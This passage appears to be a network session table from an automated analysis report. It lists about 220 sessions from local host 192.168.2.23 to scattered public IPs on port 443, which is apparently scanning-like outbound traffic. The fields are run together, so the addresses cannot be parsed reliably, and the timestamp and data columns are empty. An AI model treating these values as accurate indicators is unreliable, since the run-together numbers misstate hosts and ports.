                                          18194192.168.2.23511882.114.205.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18195192.168.2.235968272.218.77.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18196192.168.2.235919636.180.133.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18197192.168.2.2355640152.28.51.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18198192.168.2.2356508146.173.241.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18199192.168.2.236025848.56.156.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18200192.168.2.23518361.3.116.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18201192.168.2.2359782106.251.205.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18202192.168.2.2336850147.37.151.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18203192.168.2.2340958150.15.101.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18204192.168.2.234444875.104.234.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18205192.168.2.2358978121.129.127.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18206192.168.2.2352404146.21.242.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18207192.168.2.234532458.24.159.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18208192.168.2.235455049.199.39.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18209192.168.2.2360698198.45.168.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18210192.168.2.2334312163.194.206.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18211192.168.2.2359112173.217.169.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18212192.168.2.2346898188.239.228.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18213192.168.2.2356034152.102.237.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18214192.168.2.234734834.64.244.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18215192.168.2.2337208102.59.141.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18216192.168.2.234496448.64.151.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18217192.168.2.2355948208.165.99.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18218192.168.2.236055825.160.192.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18219192.168.2.2344268104.74.214.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18220192.168.2.234042285.184.158.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18221192.168.2.2352918163.52.152.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18222192.168.2.2350488186.91.159.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18223192.168.2.233744840.12.134.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18224192.168.2.2341760132.95.20.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18225192.168.2.2355816152.166.102.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18226192.168.2.235059037.136.142.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18227192.168.2.2355306117.133.148.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18228192.168.2.235605463.78.68.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18229192.168.2.2360750208.98.109.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18230192.168.2.2346652199.100.189.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18231192.168.2.2357148134.0.216.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18232192.168.2.2344818217.163.76.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18233192.168.2.233950686.205.84.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18234192.168.2.234125238.26.213.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18235192.168.2.234148691.238.186.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18236192.168.2.2335258124.163.48.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18237192.168.2.234318488.169.4.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18238192.168.2.2341480101.1.103.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18239192.168.2.233462837.120.203.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18240192.168.2.2346886156.56.255.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18241192.168.2.235914094.76.83.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18242192.168.2.234585034.193.113.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18243192.168.2.234281054.167.158.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18244192.168.2.2335344153.107.100.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18245192.168.2.2353058139.26.227.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18246192.168.2.235702657.155.162.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18247192.168.2.234399036.158.131.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18248192.168.2.2336472123.68.219.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18249192.168.2.2339698163.200.160.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18250192.168.2.2337088174.23.201.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18251192.168.2.2356354125.129.104.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18252192.168.2.2335352142.90.212.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18253192.168.2.23604702.232.200.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18254192.168.2.2359550114.192.209.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18255192.168.2.2340946157.84.90.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18256192.168.2.2335886204.123.135.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18257192.168.2.234252058.105.243.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18258192.168.2.2339470119.202.190.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18259192.168.2.2356908121.97.175.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18260192.168.2.2334698212.212.194.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18261192.168.2.2349938206.80.157.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18262192.168.2.235904497.175.235.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18263192.168.2.234086418.152.253.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18264192.168.2.2357908103.194.125.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18265192.168.2.235866085.86.71.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18266192.168.2.2357802135.13.16.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18267192.168.2.233428650.28.127.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18268192.168.2.2352874119.43.1.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18269192.168.2.2346262111.52.63.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18270192.168.2.2344320130.175.149.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18271192.168.2.2359038149.26.170.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18272192.168.2.2345676122.116.202.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18273192.168.2.2333646146.211.186.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18274192.168.2.236057438.254.91.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18275192.168.2.2359832151.143.199.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18276192.168.2.235119473.189.118.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18277192.168.2.2350110186.151.65.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18278192.168.2.2343282185.159.115.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18279192.168.2.235625420.117.195.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18280192.168.2.235264273.196.116.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18281192.168.2.234199468.198.130.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18282192.168.2.234587864.135.108.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18283192.168.2.2340358197.250.53.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18284192.168.2.2334378195.73.31.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18285192.168.2.2333228169.93.196.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18286192.168.2.2355814210.116.120.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18287192.168.2.233321683.212.49.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18288192.168.2.2352732178.122.215.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18289192.168.2.23596609.29.120.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18290192.168.2.2341638130.10.187.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18291192.168.2.2348194156.45.148.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18292192.168.2.2348416125.240.173.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18293192.168.2.234888219.235.204.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18294192.168.2.235236241.242.117.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18295192.168.2.234838865.175.214.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18296192.168.2.2349198164.188.254.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18297192.168.2.2341816137.205.12.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18298192.168.2.2346054168.222.148.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18299192.168.2.2354900153.141.238.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18300192.168.2.233647863.156.184.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18301192.168.2.234342641.33.179.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18302192.168.2.2346758157.57.116.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18303192.168.2.233442824.211.87.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18304192.168.2.2343970111.224.237.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18305192.168.2.2353868221.97.119.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18306192.168.2.2343738118.252.49.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18307192.168.2.2340324169.243.216.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18308192.168.2.2333148112.113.116.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18309192.168.2.2335992144.8.175.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18310192.168.2.234949467.148.75.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18311192.168.2.235126463.1.245.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18312192.168.2.2357938201.168.51.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18313192.168.2.234515260.80.165.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18314192.168.2.235587257.160.105.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18315192.168.2.233854095.107.172.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18316192.168.2.234326269.109.134.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18317192.168.2.236004217.199.164.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18318192.168.2.234725819.193.2.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18319192.168.2.234162819.206.232.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18320192.168.2.234969696.36.206.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18321192.168.2.2338792173.178.203.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18322192.168.2.23587708.65.30.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18323192.168.2.2347912167.20.184.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18324192.168.2.2356392112.130.0.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18325192.168.2.233853261.124.10.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18326192.168.2.2350116199.241.106.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18327192.168.2.2338518177.244.176.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18328192.168.2.2359802109.241.156.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18329192.168.2.2358342123.203.246.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18330192.168.2.2341376203.96.181.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18331192.168.2.234821649.18.68.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18332192.168.2.2348404121.124.162.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18333192.168.2.233324435.101.57.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18334192.168.2.234789457.155.203.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18335192.168.2.2353472209.17.19.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18336192.168.2.2337592208.223.243.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18337192.168.2.2345502104.135.177.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18338192.168.2.2360978201.230.219.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18339192.168.2.2355166210.160.203.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18340192.168.2.2360178128.1.29.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18341192.168.2.234195034.42.113.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18342192.168.2.2350086160.113.237.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18343192.168.2.235204098.247.65.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18344192.168.2.2342514147.95.178.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18345192.168.2.2351904177.79.153.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18346192.168.2.233285231.27.253.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18347192.168.2.2351874178.78.222.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18348192.168.2.2340582208.0.63.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18349192.168.2.2338144159.43.235.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18350192.168.2.2351544155.66.230.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18351192.168.2.2335646132.128.82.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18352192.168.2.235189249.220.200.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18353192.168.2.234222478.26.29.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18354192.168.2.2337878106.237.80.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18355192.168.2.233681665.33.182.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18356192.168.2.2347240150.82.38.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18357192.168.2.2333382104.134.198.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18358192.168.2.234301080.246.249.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18359192.168.2.2349160138.211.40.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18360192.168.2.2338720144.82.153.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18361192.168.2.2339754188.180.120.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18362192.168.2.2349558122.195.65.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18363192.168.2.2356938197.60.206.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18364192.168.2.2352974113.220.194.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18365192.168.2.2335890148.167.252.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18366192.168.2.2355796110.51.174.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18367192.168.2.2351098147.29.249.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18368192.168.2.2340828172.75.236.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18369192.168.2.23491364.151.174.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18370192.168.2.2358392206.214.107.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18371192.168.2.233642063.221.79.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18372192.168.2.234650446.130.39.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18373192.168.2.235192434.208.11.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18374192.168.2.234308024.179.7.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18375192.168.2.2356204120.240.213.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18376192.168.2.2338142126.145.119.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18377192.168.2.2360936113.16.41.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18378192.168.2.2348778196.62.212.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18379192.168.2.234923634.73.112.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18380192.168.2.233619220.95.63.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18381192.168.2.2357838210.185.217.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18382192.168.2.2342052116.135.201.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18383192.168.2.235627043.255.146.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18384192.168.2.234255088.147.107.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18385192.168.2.2355364202.56.40.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18386192.168.2.2345308113.159.53.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18387192.168.2.2345522147.184.220.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18388192.168.2.236035858.117.239.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18389192.168.2.2354538124.211.140.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18390192.168.2.233793843.12.177.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18391192.168.2.2357272140.135.240.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18392192.168.2.233914471.87.148.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18393192.168.2.2358688148.53.108.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18394192.168.2.236013444.59.191.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18395192.168.2.2335786163.214.112.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18396192.168.2.234386220.223.125.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18397192.168.2.235028223.189.61.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18398192.168.2.2341470184.92.227.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18399192.168.2.2333076200.46.146.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18400192.168.2.2351518120.73.38.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18401192.168.2.234914060.75.165.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18402192.168.2.2348058190.18.12.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18403192.168.2.2340694150.54.12.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18404192.168.2.2356432211.167.59.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18405192.168.2.2355644181.85.190.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18406192.168.2.2357034165.216.148.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18407192.168.2.2345692182.1.29.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18408192.168.2.234257849.93.109.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18409192.168.2.2345552162.178.249.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18410192.168.2.234705646.25.68.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18411192.168.2.23492929.68.52.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18412192.168.2.235127020.100.5.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18413192.168.2.235227443.31.38.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18414192.168.2.2343706165.97.75.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18415192.168.2.2355460208.187.83.135443
                                          TimestampBytes transferredDirectionData


